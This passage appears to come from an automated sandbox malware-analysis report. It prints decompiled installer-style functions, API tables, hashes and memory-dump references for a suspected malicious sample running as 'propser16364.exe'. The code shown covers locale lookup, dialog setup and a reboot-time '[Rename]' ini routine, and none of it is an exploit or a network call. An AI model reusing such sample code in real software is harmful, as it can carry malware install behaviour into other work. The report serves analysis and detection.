                                                              0x004040be
                                                              0x004040d1
                                                              0x004040e9
                                                              0x004040eb
                                                              0x004040f1
                                                              0x00404106
                                                              0x004040f3
                                                              0x004040fc
                                                              0x004040fe
                                                              0x004040fe
                                                              0x0040410c
                                                              0x0040411d
                                                              0x0040412e
                                                              0x00404135
                                                              0x0040413f
                                                              0x00404144
                                                              0x00404146
                                                              0x00000000
                                                              0x0040414c
                                                              0x0040414c
                                                              0x0040414e
                                                              0x00000000
                                                              0x00000000
                                                              0x00404154
                                                              0x00404158
                                                              0x0040417d
                                                              0x00404183
                                                              0x00404189
                                                              0x0040418b
                                                              0x00000000
                                                              0x00000000
                                                              0x004041b1
                                                              0x004041b7
                                                              0x004041b9
                                                              0x004041be
                                                              0x00000000
                                                              0x00000000
                                                              0x004041c4
                                                              0x004041c7
                                                              0x004041ca
                                                              0x004041e1
                                                              0x004041ed
                                                              0x00404206
                                                              0x00404210
                                                              0x00404215
                                                              0x0040421b
                                                              0x00000000
                                                              0x00000000
                                                              0x00404225
                                                              0x00404230
                                                              0x00000000
                                                              0x00404230
                                                              0x0040415a
                                                              0x00404160
                                                              0x00000000
                                                              0x00000000
                                                              0x00404166
                                                              0x0040416c
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404172
                                                              0x00404146
                                                              0x0040423d
                                                              0x00404249
                                                              0x00404250
                                                              0x00000000
                                                              0x00403fa0
                                                              0x00403fa0
                                                              0x00403fa3
                                                              0x00403fd6
                                                              0x00403fd6
                                                              0x00403fd8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403fd8
                                                              0x00403fa9
                                                              0x00403fae
                                                              0x00403fb0
                                                              0x00000000
                                                              0x00000000
                                                              0x00403fc0
                                                              0x00403fc8
                                                              0x00000000
                                                              0x00403fce
                                                              0x00403dfc
                                                              0x00403dfc
                                                              0x00403e00
                                                              0x00403e05
                                                              0x00403e14
                                                              0x00403e14
                                                              0x00403e1d
                                                              0x00403e26
                                                              0x00403e31
                                                              0x00403e31
                                                              0x00403e3d
                                                              0x00403e59
                                                              0x00403e5c
                                                              0x00403e6f
                                                              0x00403e75
                                                              0x00403f18
                                                              0x00000000
                                                              0x00403f21
                                                              0x00403e7b
                                                              0x00403e88
                                                              0x00403e8a
                                                              0x00403e8c
                                                              0x00403eab
                                                              0x00403eab
                                                              0x00403eae
                                                              0x00403eb3
                                                              0x00403eb6
                                                              0x00403ec6
                                                              0x00403ec7
                                                              0x00403ec9
                                                              0x00403eff
                                                              0x00403f12
                                                              0x00000000
                                                              0x00403f12
                                                              0x00403ecb
                                                              0x00403ed1
                                                              0x00403eea
                                                              0x00403eef
                                                              0x00403ef1
                                                              0x00000000
                                                              0x00000000
                                                              0x00403ef3
                                                              0x00403edf
                                                              0x00403edf
                                                              0x00403ee1
                                                              0x00403ee1
                                                              0x00000000
                                                              0x00403ee1
                                                              0x00403ed4
                                                              0x00403ed9
                                                              0x00000000
                                                              0x00403ed9
                                                              0x00403eb8
                                                              0x00403ebe
                                                              0x00000000
                                                              0x00000000
                                                              0x00403ec0
                                                              0x00000000
                                                              0x00403ec0
                                                              0x00403eb0
                                                              0x00000000
                                                              0x00403eb0
                                                              0x00403e96
                                                              0x00403e9d
                                                              0x00403ea3
                                                              0x00403ea5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403ea5
                                                              0x00403e61
                                                              0x00000000
                                                              0x00403e3f
                                                              0x00403e45
                                                              0x00403e4f
                                                              0x00404256
                                                              0x0040425c
                                                              0x0040425e
                                                              0x00404264
                                                              0x00404269
                                                              0x0040426f
                                                              0x0040426f
                                                              0x00404264
                                                              0x00404279
                                                              0x00000000
                                                              0x00404279
                                                              0x00403e3d

                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E14
                                                              • ShowWindow.USER32(?), ref: 00403E31
                                                              • DestroyWindow.USER32 ref: 00403E45
                                                              • SetWindowLongA.USER32 ref: 00403E61
                                                              • GetDlgItem.USER32(?,?), ref: 00403E82
                                                              • SendMessageA.USER32 ref: 00403E96
                                                              • IsWindowEnabled.USER32(00000000), ref: 00403E9D
                                                              • GetDlgItem.USER32(?,00000001), ref: 00403F4B
                                                              • GetDlgItem.USER32(?,00000002), ref: 00403F55
                                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403F6F
                                                              • SendMessageA.USER32 ref: 00403FC0
                                                              • GetDlgItem.USER32(?,00000003), ref: 00404066
                                                              • ShowWindow.USER32(00000000,?), ref: 00404087
                                                              • EnableWindow.USER32(?,?), ref: 00404099
                                                              • EnableWindow.USER32(?,?), ref: 004040B4
                                                              • GetSystemMenu.USER32 ref: 004040CA
                                                              • EnableMenuItem.USER32 ref: 004040D1
                                                              • SendMessageA.USER32 ref: 004040E9
                                                              • SendMessageA.USER32 ref: 004040FC
                                                              • lstrlenA.KERNEL32(00420D50,?,00420D50,00000000), ref: 00404126
                                                              • SetWindowTextA.USER32(?,00420D50), ref: 00404135
                                                              • ShowWindow.USER32(?,0000000A), ref: 00404269
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                              • String ID: PB
                                                              • API String ID: 184305955-3196168531
                                                              • Opcode ID: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
                                                              • Instruction ID: 6f64ab7c90c2728ca861f65b52108cf4a96aadf8bbc29eaef7369c8c365bd3a4
                                                              • Opcode Fuzzy Hash: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
                                                              • Instruction Fuzzy Hash: F2C1C2B1A00300BFDB216F61EE45D2B3AB8EB85746F41053EF641B51F1CB3999829B5D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00403A3B, Relevance: 49.2, APIs: 13, Strings: 15, Instructions: 215stringregistryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 96%
                                                              			E00403A3B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x424754;
				_t17 = E00406631(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x420d50;
					"1033" = 0x30;
					 *0x42b001 = 0x78;
					 *0x42b002 = 0;
					E0040610F(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420d50, 0);
					__eflags =  *0x420d50;
					if(__eflags == 0) {
						E0040610F(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x420d50, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E00406186("1033",  *_t17() & 0x0000ffff);
				}
				E00403D00(_t71, _t84);
				_t80 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
				 *0x4247e0 =  *0x42475c & 0x00000020;
				 *0x4247fc = 0x10000;
				if(E00405CAE(_t84, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CAE(_t92, _t80) == 0) {
						E004062BB(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x424740, 0x67, 1, 0, 0, 0x8040);
					 *0x423f28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D00(_t71, __eflags);
							__eflags =  *0x424800;
							if( *0x424800 != 0) {
								_t28 = E00405421(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x423f0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420d30, 5);
							_t34 = E004065C3("RichEd20");
							__eflags = _t34;
							if(_t34 == 0) {
								E004065C3("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x423ee0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423ee0);
								 *0x423f04 = _t81;
								RegisterClassA(0x423ee0);
							}
							_t36 =  *0x423f20; // 0x0
							_t39 = DialogBoxParamA( *0x424740, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DD8, 0);
							E0040398B(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x424740;
						 *0x423ee4 = E00401000;
						 *0x423ef0 =  *0x424740;
						 *0x423ef4 = _t25;
						 *0x423f04 = 0x40a210;
						if(RegisterClassA(0x423ee0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x420d30 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x424740, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x4236e0;
					E0040610F(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x424798, 0x4236e0, 0);
					_t57 =  *0x4236e0; // 0x75
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x4236e1;
						 *((char*)(E00405BEB(0x4236e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00406228(_t80, E00405BC0(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C07(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                              0x00403a41
                                                              0x00403a4a
                                                              0x00403a51
                                                              0x00403a53
                                                              0x00403a67
                                                              0x00403a79
                                                              0x00403a80
                                                              0x00403a87
                                                              0x00403a8d
                                                              0x00403a92
                                                              0x00403a98
                                                              0x00403aab
                                                              0x00403aab
                                                              0x00403ab6
                                                              0x00403a55
                                                              0x00403a60
                                                              0x00403a60
                                                              0x00403abb
                                                              0x00403ac5
                                                              0x00403ace
                                                              0x00403ad3
                                                              0x00403ae4
                                                              0x00403b6b
                                                              0x00403b73
                                                              0x00403b7c
                                                              0x00403b7c
                                                              0x00403b92
                                                              0x00403b98
                                                              0x00403ba6
                                                              0x00403c27
                                                              0x00403c2f
                                                              0x00403c39
                                                              0x00403c3e
                                                              0x00403c44
                                                              0x00403cce
                                                              0x00403cd3
                                                              0x00403cd5
                                                              0x00403cf1
                                                              0x00000000
                                                              0x00403cf1
                                                              0x00403cd7
                                                              0x00403cdd
                                                              0x00403ce5
                                                              0x00403ce5
                                                              0x00000000
                                                              0x00403cdd
                                                              0x00403c52
                                                              0x00403c5d
                                                              0x00403c62
                                                              0x00403c64
                                                              0x00403c6b
                                                              0x00403c6b
                                                              0x00403c76
                                                              0x00403c7e
                                                              0x00403c80
                                                              0x00403c82
                                                              0x00403c8b
                                                              0x00403c8e
                                                              0x00403c94
                                                              0x00403c94
                                                              0x00403c9a
                                                              0x00403cb3
                                                              0x00403cc4
                                                              0x00000000
                                                              0x00403cc9
                                                              0x00403c31
                                                              0x00403c33
                                                              0x00000000
                                                              0x00403ba8
                                                              0x00403ba8
                                                              0x00403bb4
                                                              0x00403bbe
                                                              0x00403bc4
                                                              0x00403bc9
                                                              0x00403bd8
                                                              0x00403cf6
                                                              0x00403cf6
                                                              0x00000000
                                                              0x00403cf6
                                                              0x00403be7
                                                              0x00403c22
                                                              0x00000000
                                                              0x00403c22
                                                              0x00403aea
                                                              0x00403aea
                                                              0x00403aed
                                                              0x00403aef
                                                              0x00000000
                                                              0x00000000
                                                              0x00403af9
                                                              0x00403b09
                                                              0x00403b0e
                                                              0x00403b15
                                                              0x00000000
                                                              0x00000000
                                                              0x00403b19
                                                              0x00403b1b
                                                              0x00403b28
                                                              0x00403b28
                                                              0x00403b30
                                                              0x00403b36
                                                              0x00403b5e
                                                              0x00403b66
                                                              0x00000000
                                                              0x00403b48
                                                              0x00403b49
                                                              0x00403b52
                                                              0x00403b58
                                                              0x00403b59
                                                              0x00000000
                                                              0x00403b59
                                                              0x00403b54
                                                              0x00403b56
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403b56
                                                              0x00403b36

                                                              APIs
                                                                • Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                                                • Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?,?,?,004034D4,0000000B), ref: 0040665E
                                                              • lstrcatA.KERNEL32(1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,76712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\propser16364.exe",00000000), ref: 00403AB6
                                                              • lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,76712754), ref: 00403B2B
                                                              • lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
                                                              • GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403B49
                                                              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403B92
                                                                • Part of subcall function 00406186: wsprintfA.USER32 ref: 00406193
                                                              • RegisterClassA.USER32(00423EE0), ref: 00403BCF
                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE7
                                                              • CreateWindowExA.USER32 ref: 00403C1C
                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403C52
                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,00423EE0), ref: 00403C7E
                                                              • GetClassInfoA.USER32(00000000,RichEdit,00423EE0), ref: 00403C8B
                                                              • RegisterClassA.USER32(00423EE0), ref: 00403C94
                                                              • DialogBoxParamA.USER32 ref: 00403CB3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: "C:\Users\user\AppData\Roaming\propser16364.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$PB$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$uvlcopdlxoed$>B
                                                              • API String ID: 1975747703-409859992
                                                              • Opcode ID: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
                                                              • Instruction ID: 0b0e7d8dfe967f47b98d7fa3c12120eb495d8fa8be153c65172cdb3e572a9271
                                                              • Opcode Fuzzy Hash: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
                                                              • Instruction Fuzzy Hash: A061C4702046046EE620AF65AD46F3B3A7CEB8574AF40443FF951B62D3CB7D99068A2D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00404417, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 93%
                                                              			E00404417(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x41fd1c =  *0x41fd1c + 1;
								__eflags =  *0x41fd1c;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404313(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x4236e0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									_t40 =  &_v8; // 0x4236e0
									E004046BB(_a4,  *_t40);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x424748, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x424748, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x41fd1c; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x420528 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E004042CE(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E00404697();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x423f1c; // 0x501c89
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x424798;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E004043E2;
					E004042AC(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E004042AC(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E004042CE( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E004042E1(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x424754 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x41fd1c = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x41fd1c = 0;
					return 0;
				}
			}



















                                                              0x00404427
                                                              0x00404539
                                                              0x0040454c
                                                              0x004045a8
                                                              0x004045a8
                                                              0x004045ac
                                                              0x00404672
                                                              0x00404679
                                                              0x0040467b
                                                              0x0040467b
                                                              0x0040467b
                                                              0x00404681
                                                              0x00404681
                                                              0x00404684
                                                              0x00000000
                                                              0x0040468b
                                                              0x004045ba
                                                              0x004045bc
                                                              0x004045bf
                                                              0x004045c6
                                                              0x004045c8
                                                              0x004045cf
                                                              0x004045d1
                                                              0x004045d4
                                                              0x004045d7
                                                              0x004045dc
                                                              0x004045e2
                                                              0x004045e5
                                                              0x004045ec
                                                              0x004045fa
                                                              0x00404612
                                                              0x00404614
                                                              0x00404616
                                                              0x0040461c
                                                              0x0040462b
                                                              0x0040462d
                                                              0x0040462d
                                                              0x004045ec
                                                              0x004045cf
                                                              0x00404630
                                                              0x00404637
                                                              0x00000000
                                                              0x00404639
                                                              0x00404639
                                                              0x00404640
                                                              0x00000000
                                                              0x00000000
                                                              0x00404642
                                                              0x00404646
                                                              0x00404657
                                                              0x00404657
                                                              0x00404659
                                                              0x0040465d
                                                              0x0040466b
                                                              0x0040466b
                                                              0x00000000
                                                              0x0040466f
                                                              0x00404637
                                                              0x00404554
                                                              0x00404557
                                                              0x00000000
                                                              0x00000000
                                                              0x0040455f
                                                              0x00404565
                                                              0x00000000
                                                              0x00000000
                                                              0x00404571
                                                              0x00404574
                                                              0x00404577
                                                              0x00000000
                                                              0x00000000
                                                              0x0040459a
                                                              0x0040459a
                                                              0x0040459c
                                                              0x0040459e
                                                              0x004045a3
                                                              0x00000000
                                                              0x0040442d
                                                              0x0040442d
                                                              0x00404430
                                                              0x00404435
                                                              0x00404437
                                                              0x00404446
                                                              0x00404446
                                                              0x0040444d
                                                              0x00404450
                                                              0x00404452
                                                              0x00404457
                                                              0x00404460
                                                              0x00404466
                                                              0x00404472
                                                              0x00404475
                                                              0x0040447e
                                                              0x00404483
                                                              0x00404486
                                                              0x0040448b
                                                              0x004044a2
                                                              0x004044a9
                                                              0x004044bc
                                                              0x004044bf
                                                              0x004044d4
                                                              0x004044db
                                                              0x004044e0
                                                              0x004044e5
                                                              0x004044e5
                                                              0x004044f4
                                                              0x00404503
                                                              0x00404515
                                                              0x0040451a
                                                              0x0040452a
                                                              0x0040452c
                                                              0x00000000
                                                              0x00404532

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                              • String ID: N$6B
                                                              • API String ID: 3103080414-649610290
                                                              • Opcode ID: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
                                                              • Instruction ID: 4db3d1b8578fb28e8129a2e139a0a5bbbdeef9899b51b491bef805f45c6f40d7
                                                              • Opcode Fuzzy Hash: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
                                                              • Instruction Fuzzy Hash: 5761B2B1A00209BFDB109F61DD45F6A3B69EB85310F11843AFB01BA2D1D7BD9952CF98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405E97, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 129memorystringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00405E97(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x422ae0 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x422ee0
					_t12 = GetShortPathNameA( *_t2, 0x422ee0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4226e0, "%s=%s\r\n", 0x422ae0, 0x422ee0);
						_t53 = _t52 + 0x10;
						E004062BB(_t37, 0x400, 0x422ee0, 0x422ee0,  *((intOrPtr*)( *0x424754 + 0x128)));
						_t12 = E00405DC1(0x422ee0, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E39(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D26(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D26(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D7C(_t24 + _t46, 0x4226e0, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E68(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DC1(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x422ae0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                              0x00405e97
                                                              0x00405ea0
                                                              0x00405ea7
                                                              0x00405ebb
                                                              0x00405ee3
                                                              0x00405eea
                                                              0x00405eee
                                                              0x00405ef2
                                                              0x00405f12
                                                              0x00405f19
                                                              0x00405f23
                                                              0x00405f30
                                                              0x00405f35
                                                              0x00405f3a
                                                              0x00405f3e
                                                              0x00405f4d
                                                              0x00405f4f
                                                              0x00405f5c
                                                              0x00405f60
                                                              0x00405ffb
                                                              0x00000000
                                                              0x00405f76
                                                              0x00405f83
                                                              0x00405fa7
                                                              0x00405fab
                                                              0x00405fca
                                                              0x00405fce
                                                              0x00405fce
                                                              0x00405fd0
                                                              0x00405fd9
                                                              0x00405fe4
                                                              0x00405fef
                                                              0x00405ff5
                                                              0x00000000
                                                              0x00405ff5
                                                              0x00405fad
                                                              0x00405fb0
                                                              0x00405fbb
                                                              0x00405fb7
                                                              0x00405fb9
                                                              0x00405fba
                                                              0x00405fba
                                                              0x00405fc2
                                                              0x00405fc4
                                                              0x00000000
                                                              0x00405fc4
                                                              0x00405f8e
                                                              0x00405f94
                                                              0x00000000
                                                              0x00405f94
